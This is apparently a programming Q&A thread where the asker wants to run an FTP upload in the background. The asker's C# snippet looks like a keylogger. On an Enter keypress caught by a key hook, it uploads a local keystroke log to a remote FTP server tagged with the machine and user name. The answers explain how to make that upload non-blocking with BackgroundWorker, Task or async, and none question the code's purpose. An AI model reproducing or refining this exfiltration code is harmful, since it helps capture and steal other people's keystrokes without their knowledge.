# Threading FTP upload c#

Tags: c#, multithreading, upload, ftp, backgroundworker

I'm having trouble figuring out how to thread my FTP upload script. I'm trying to get it to upload from a C# console application. I dont like the fact that it freezes the app while it uploads. I've heard of using a "backgroundworker" but i have absolutely no idea how to set that up.. I've been searching for a while. Can you give me an example? Thanks.

```
if ((Keys)vkCode == Keys.Enter)
{
                        //~~~ Enter Key pressed ~~~ //
                            string ftpsrc = Application.StartupPath + @"/logs/log.txt";
                            FtpWebRequest request2 = (FtpWebRequest)WebRequest.Create("ftp://server.com" + System.Environment.MachineName + "___" + System.Environment.UserName + @"/" + "log.txt");
                                    request2.Method = WebRequestMethods.Ftp.UploadFile;
                                    request2.Credentials = new NetworkCredential("username", "password");
                                    StreamReader sourceStream2 = new StreamReader(ftpsrc);
                                    byte[] fileContents2 = Encoding.UTF8.GetBytes(sourceStream2.ReadToEnd());
                                    sourceStream2.Close();
                                    request2.ContentLength = fileContents2.Length;
                                    Stream requestStream2 = request2.GetRequestStream();
                                    requestStream2.Write(fileContents2, 0, fileContents2.Length);
                                    requestStream2.Close();
                                    FtpWebResponse response2 = (FtpWebResponse)request2.GetResponse();
                                    response2.Close();


                            //~~~ End Enter Key ~~~//
                        }
```

Answer (score 3, accepted):

A very simple way of doing this would be to use something like a `BackgroundWorker` which would give you access to things like progress events as well as control over the execution. This method would allow you to have the UI thread completely seperate from your logic of the FTP upload. Meaning your UI would be responsive no matter how long the upload took too complete.

Now multi-threading the actual upload is a different matter. If that is what you were after it will require breaking the message up into equal parts and having the parts reassembled on the FTP side, but that would mean writing a custom ftp server as well.

Take a look here for a full explanation on what the BackgroundWorker is and how to use it:
http://msdn.microsoft.com/en-us/library/system.componentmodel.backgroundworker.aspx

EDIT::

Ok so to answer your question in the comments about how to setup the backgroundworker to execute on the enter key. Take a look at the above docs to get the gist of how to use a backgroundworker in general.

You would want to change your current key hook with the `RunWorkerAsync()` method of the backgroundworker you setup. The `DoWork` method of the BackgroundWorker should be what you currently have in your key hook.

```
    BG.DoWork += YourUploadFunction();

    if ((Keys)vkCode == Keys.Enter)
    {
         //~~~ Enter Key pressed ~~~ //
         BG.RunWorkerAsync();
    }
```

To initialize the `BackgroundWorker` do this:

```
    BackgroundWorker BG = new BackgroundWorker();
    BG.DoWork += new DoWorkEventHandler(BG_DoWork);
```

The `DoWorkEventHandler` allows a new handler to be made to control what function/s the BG will do. An example of this would be:

```
    private void BG_DoWork(object sender, DoWorkEventArgs e)
    {   
         YourUploadFunctions();
    }
```

However you would want to do the initialization of the `BackgroundWorker` only once so that you do not have multiple instances of it. Also once the DoWork event has been setup, it does not need to be done again.
`

Comment: I've heard of using a background worker.. would you be able to give me an example of a backgroundworker that would be called when the enter key is used? such as if ((Keys)vkCode == Keys.Enter)
{ //stuffs }

Comment: Thank you so much! i was looking for an actual example. I'm just a noob trying to learn some c#. i appreciate you helping me out! Ill be in contact if i need assistance.

Comment: Is there something else that im suppose to add? im getting "an object reference is required for the non-static field, method, or property 'Program.class.BG'. I will add the full program if that would help?

Comment: @Chris_Bogausch You are getting the error because you need to have a Background worker initialized first. Check my edits again.

Answer (score 0):

BackgroundWorkers will work great for this, also another option is the Task class.  You can read about it here [Task Class](http://msdn.microsoft.com/en-us/library/system.threading.tasks.task.aspx)  .  There is an example of how to implement it on the page.  Also depending on what version of the .net framework you are coding with you could also look into Async and Await shown here [async await](http://msdn.microsoft.com/en-us/library/vstudio/hh191443.aspx).